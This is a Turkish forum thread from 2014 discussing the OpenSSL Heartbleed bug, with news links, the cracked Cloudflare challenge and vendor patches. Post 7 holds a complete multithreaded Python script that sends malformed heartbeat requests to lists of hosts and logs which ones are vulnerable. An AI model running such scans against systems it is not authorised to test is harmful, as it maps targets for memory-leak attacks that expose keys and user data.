Tahribat.com Forumları
Web sitesi Güvenliği, DOS - DDOS Saldırıları...
Openssl Güvenlik Açığı - Heartbleed Bug

Yazar _Dert_ (1) 0x656e (1) adeleks (1) Andrei (1) babayarisi (1) Buremba (1) Caliber (1) coLin (6) csfrt (1) cuneyd (1) d3lete (1) detCode (2) DevilKingtr (1) EcHoLL (5) EdepsizPenguen (1) hatayi (1) HolyOne (11) Jilet_Boris (1) K4R4B4S4N (5) KaptaN (5) koray (1) krypt (2) Mr_Dark (2) mrkps (3) Naacal (1) NoToLeRaNcE (1) Pasific (1) pesimistzombie (1) piskopatix (1) ran (1) RDxMaster (1) Realist (1) Schwarz (1) TaRuZ (1) tereke34 (2) torpedo_XL (7) Twitter (1) YasamaK (2) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Yapay Zeka     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Openssl Güvenlik Açığı - Heartbleed Bug

1. 12/Nis/14 04:20 Kısayol Şikayet Özel Mesaj
   EcHoLL
   
   

   Kayıt Tarihi: 04/Eylül/2008
   

   piskopatix bunu yazdı

   NSA bu bug`i en az 2 senedir biliyormus ve kullaniyormus rastladigim almanca kaynakli habere göre.

   http://www.t-online.de/nachrichten/specials/id_68964410/nsa-soll-heartbleed-schon-seit-jahren-ausgenutzt-haben.html

    

   edit// ingilizce kanak buldum bitanede

   http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html

   ilk postlarda zaten söylemiştim bilindigini emin olun rapidssl de var aynı açık public değil yakında oda patlar

   ---

   "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
   Alıntı yap
2. 12/Nis/14 04:22 Kısayol Şikayet Özel Mesaj
   NoToLeRaNcE
   
   

   Kayıt Tarihi: 09/Eylül/2005
   

   EcHoLL bunu yazdı

   piskopatix bunu yazdı

   NSA bu bug`i en az 2 senedir biliyormus ve kullaniyormus rastladigim almanca kaynakli habere göre.

   http://www.t-online.de/nachrichten/specials/id_68964410/nsa-soll-heartbleed-schon-seit-jahren-ausgenutzt-haben.html

    

   edit// ingilizce kanak buldum bitanede

   http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html

   ilk postlarda zaten söylemiştim bilindigini emin olun rapidssl de var aynı açık public değil yakında oda patlar

   Internetten el etek cekme vakti geldi o zaman :/

   ---

   Asosyal hayatta yaşanan, Yasal bir masalım ..
   Alıntı yap
3. 12/Nis/14 04:35 Kısayol Şikayet Özel Mesaj
   Buremba
   
   

   Kayıt Tarihi: 16/Haziran/2006
   

   cloudflare heartbleed açığı bulunan test server'ı açıp challenge olarak da hadi private keyi bulun dedi adamın biri 12 saatte çıkardı private keyi. https://www.cloudflarechallenge.com/heartbleed

   ssl'ler şifreler falan hikaye yani, bilen nerde nasıl kullanmıştır bu açığı bilinmez.

   ---

   . . .. . ... .
   Alıntı yap
4. 13/Nis/14 01:25 Kısayol Şikayet Özel Mesaj
   Realist
   
   

   Kayıt Tarihi: 13/Nisan/2007
   

   script kiddies

   ---

   ..
   Alıntı yap
5. 14/Nis/14 00:13 Kısayol Şikayet Özel Mesaj
   Zork.
   torpedo_XL
   
   

   Kayıt Tarihi: 21/Ağustos/2005
   

   Akamai kendi geliştirdikleri openSSL için custom secure_malloc kodlarını yayınladı. Anlayabildiğim kadarı ile RSA private keyleri için güvenli bir saklama çözünü sunuyor

   http://thread.gmane.org/gmane.comp.encryption.openssl.user/51243?resub=1

    

   ---

   Bilge insanlar konuşurlar çünkü söyleyecek bir şeyleri vardır. Aptal insanlar konuşurlar çünkü bir şey söylemek zorundadırlar. Demokrasi, bir eğitim işidir. Eğitimsiz kitlelerle demokrasiye geçilirse oligarşi olur. Devam edilirse demagoglar türer. Demagoglardan da diktatörler çıkar. --Platon, Devlet                                                                                                                                                                                                                                                                                                                                                                                         
   Alıntı yap
6. 14/Nis/14 00:20 Kısayol Şikayet Özel Mesaj
   Zork.
   torpedo_XL
   
   

   Kayıt Tarihi: 21/Ağustos/2005
   

   Cloudflare in OpenSSL challenge i kırıldı.

   https://www.cloudflarechallenge.com/heartbleed

   bu adreste cloudflare rsa key oluşturup yiyosa kırın diye challenge oluşturdu. Çok geçmeden tabi hallettiler :D

   RSA key:

   https://gist.github.com/indutny/a11c2568533abcf8b9a1

    

   Burda da kırdığını ilan etti:

   https://twitter.com/indutny/status/454773820822679552

    

    

   torpedo_XL tarafından 14/Nis/14 00:20 tarihinde düzenlenmiştir

   ---

   Bilge insanlar konuşurlar çünkü söyleyecek bir şeyleri vardır. Aptal insanlar konuşurlar çünkü bir şey söylemek zorundadırlar. Demokrasi, bir eğitim işidir. Eğitimsiz kitlelerle demokrasiye geçilirse oligarşi olur. Devam edilirse demagoglar türer. Demagoglardan da diktatörler çıkar. --Platon, Devlet                                                                                                                                                                                                                                                                                                                                                                                         
   Alıntı yap
7. 14/Nis/14 08:09 Kısayol Şikayet Özel Mesaj
   Naacal
   
   

   Kayıt Tarihi: 06/Nisan/2007
   

   Tek host/ip kontrol eden python scriptini çoklu host/ip kontrolü için, multi-threading ve çıktı desteği ekleyip düzenledim.

   #!/usr/bin/python
   
   import Queue
   import threading
   import sys
   import struct
   import socket
   import time
   import select
   import re
   from optparse import OptionParser
   import os
   
   options = OptionParser(usage='%prog checklist [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
   options.add_option('-o', '--output', type='str', default="//output.csv", help='Output file')
   
   def h2bin(x):
       return x.replace(' ', '').replace('\n', '').decode('hex')
   
   hello = h2bin('''
   16 03 02 00  dc 01 00 00 d8 03 02 53
   43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
   bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
   00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
   00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
   c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
   c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
   c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
   c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
   00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
   03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
   00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
   00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
   00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
   00 0f 00 01 01                                  
   ''')
   
   hb = h2bin(''' 
   18 03 02 00 03
   01 40 00
   ''')
   
   def hexdump(s):
       for b in xrange(0, len(s), 16):
           lin = [c for c in s[b : b + 16]]
           hxdat = ' '.join('%02X' % ord(c) for c in lin)
           pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
           print '  %04x: %-48s %s' % (b, hxdat, pdat)
       print
   
   def recvall(s, length, timeout=5):
       endtime = time.time() + timeout
       rdata = ''
       remain = length
       while remain > 0:
           rtime = endtime - time.time() 
           if rtime < 0:
               return None
           r, w, e = select.select([s], [], [], 5)
           if s in r:
               data = s.recv(remain)
               if not data:
                   return None
               rdata += data
               remain -= len(data)
       return rdata
           
   
   def recvmsg(s):
       hdr = recvall(s, 5)
       if hdr is None:
           return None, None, None
       typ, ver, ln = struct.unpack('>BHH', hdr)
       pay = recvall(s, ln, 10)
       if pay is None:
           return None, None, None
    
       return typ, ver, pay
   
   def hit_hb(s, url):
       opts, args = options.parse_args()
       outputfile = open((os.getcwd() + '/' + opts.output), 'a')
       s.send(hb)
       while True:
           typ, ver, pay = recvmsg(s)
           if typ is None:
               print url + ', NOT VULNERABLE'
               return False
   
           if typ == 24:
               if len(pay) > 3:
                   print url + ', VULNERABLE'
                   outputfile.write(url + ", VULNERABLE\n")
               else:
                   print url + ', NOT VULNERABLE'
               return True
   
           if typ == 21:
               print url + ', NOT VULNERABLE'
               return False
   
   
   def ssl_check(check_url):
       errorfile = open((os.getcwd() + '/errors.txt'), 'a')
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       sys.stdout.flush()
       try:
           s.connect((check_url, 443))
           sys.stdout.flush()
           s.send(hello)
           sys.stdout.flush()
           while True:
               typ, ver, pay = recvmsg(s)
               if typ == None:
                   return
               if typ == 22 and ord(pay[0]) == 0x0E:
                   break
   
           sys.stdout.flush()
           s.send(hb)
           hit_hb(s, check_url)
           s.close()
       except Exception as e:
           errorfile.write(str(e) + '\n')
   
   def worker(queue):
       queue_full = True
       while queue_full:
           try:
               url = queue.get(False)
               ssl_check(url)
           except Queue.Empty:
               queue_full = False
   
   def start():
       opts, args = options.parse_args()
       hostnames = open((os.getcwd() + '/' + args[0])).read().splitlines()
       q = Queue.Queue()
       for url in hostnames:
           q.put(url)
       thread_count = 50
       for i in range(thread_count):
           t = threading.Thread(target=worker, args = (q,))
           t.start()
   def main():
       opts, args = options.parse_args()
       if len(args) < 1:
           options.print_help()
           return
       start()
   
   if __name__ == '__main__':
       main()
   

   Kullanım: python checker.py hosts-ips.txt -o output.csv

   Alıntı yap
8. 14/Nis/14 20:40 Kısayol Şikayet Özel Mesaj
   ran
   
   

   Kayıt Tarihi: 23/Mart/2007
   

     ooooooooooooooooo dehşet ötesi bir durum

   ---

   Bilmem kaçıncı galaksiden gelen gama ışınlarına maruz kalmak için Pipimizi açıkta tutup UFO konmasını bekledik
   Alıntı yap

Cevapla